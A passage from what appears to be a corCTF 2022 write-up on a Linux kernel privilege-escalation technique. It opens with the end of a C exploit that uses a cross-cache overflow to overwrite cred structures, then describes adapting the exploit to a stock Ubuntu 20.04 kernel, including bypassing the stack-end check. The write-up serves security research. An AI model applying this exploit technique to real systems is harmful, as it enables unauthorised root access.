cred_jar"); for (int i = 0; i < CRED_JAR_INITIAL_SPRAY; i++) { pid_t result = fork(); if (!result) { just_wait(); } if (result < 0) { puts("fork limit"); exit(-1); } } // buddy allocator massage puts("massaging order 0 buddy allocations"); for (int i = 0; i < INITIAL_PAGE_SPRAY; i++) { send_spray_cmd(ALLOC_PAGE, i); } for (int i = 1; i < INITIAL_PAGE_SPRAY; i += 2) { send_spray_cmd(FREE_PAGE, i); } for (int i = 0; i < FORK_SPRAY; i++) { pid_t result = __clone(CLONE_FLAGS, &check_and_wait); if (result < 0) { perror("clone error"); exit(-1); } } for (int i = 0; i < INITIAL_PAGE_SPRAY; i += 2) { send_spray_cmd(FREE_PAGE, i); } *(uint32_t*)&evil[CHUNK_SIZE-0x6] = 1; // cross cache overflow puts("spraying cross cache overflow"); for (int i = 0; i < FINAL_PAGE_SPRAY; i++) { alloc_vuln_page(fd, isolation_pages, i); edit_vuln_page(fd, isolation_pages, i, evil, CHUNK_SIZE); } puts("notifying forks that spray is completed"); write(rootfd[1], evil, FORK_SPRAY); sleep(100000); exit(0); }

Congratulations to kylebot and pql for taking first and second blood respectively during the competition! Kylebot did not target cred struct - he cross cached onto seq_file objects for arbitrary read to leak driver addresses and for arbitrary free against the castaway_arr to build a UAF and arb write primitive. pql did target cred struct with cross cache overflow, but in a different and more stable way.  The exploit relied on setuid, which triggers prepare_creds and allocates cred objects to prepopulate cred_jar slabs. This way, the exploit can trigger allocations of such pages without much noise and then fork to retake them. I personally never expected that function to allocate these objects as I thought it would just run permission checks and mutate in place, but seems like the lesson here is to always check source. Overall, there did seem to be a notion beforehand among solvers (and other kernel pwners I talked with) that targeting cred structs in a cross cache overflow scenario will be quite difficult, if not nearly impossible, so it is quite nice to see it come to fruition.

After the CTF, I was curious to see if this technique is applicable on a real Linux system that isn’t just a minimalistic busybox setup. To test, I setup a single core default Ubuntu HWE 20.04 server VM with 4 gbs of RAM and KVM enabled. Surprisingly, upon testing the exploit on the system with the loaded drivers, only two changes were required.

For one, I had to increase the FINAL_PAGE_SPRAY macro to 50, which makes sense as this setup is an actual Linux distro with more moving parts. Another change I had to make was to adjust for Ubuntu’s kernel CONFIG_SCHED_STACK_END_CHECK option. As many of my overflows wrote into kernel stacks, the payload will cause this stack end check to fail. The check is just this macro:

#define task_stack_end_corrupted(task) \ (*(end_of_stack(task)) != STACK_END_MAGIC)

STACK_END_MAGIC is the 4 byte value 0x57AC6E9D. Our payload will just include this value instead of 1, as this is still a valid value for the usage field.

With those changes, we can achieve a working exploit agaisnt the CTF challenge driver with this technique on a real distro. The success rate is around 50%, but consider that I barely adjusted anything from the original spray I used - a more fine grained adjustment would have led to better success.

As for a multicore setup, the isolated slab of 512 byte chunks was backed by a order 1 page. This would require re-designing the spray (and setting core affinity due to per cpu slub lists), but I hypothesize that the technical concept should still hold.

Anyways, I think this is a really cool kernel exploit technique - leakless, data-only, all the pwn buzzwords! A huge thanks must also go to D3v17 and Markak for providing feedback on this writeup beforehand. Feel free to inform me if there are any confusing explanations or incorrect information in this writeup, and do let me know if you manage to use this technique in a real world exploit!

Addendum: I originally wrote most of this immediately after corCTF 2022, but decided to post after Defcon 2022 due to time constraints as I was attending the CTF and the convention (shoutout to the All Roads Lead to GKE's Host presentation from StarLabs that talked about cross cache in great depth too!). During Defcon, 0xTen mentioned to me Markak's presentation on DirtyCred at Blackhat a week earlier, which demonstrated another novel approach to attack cred structs in scenarios of UAF/double-free/arbitrary-free via cross cache and has been successfully tested on older CVEs. I guess this cross cache technique has truly revived cred objects as a viable target for exploitation in the most common classes of memory safety bugs 😎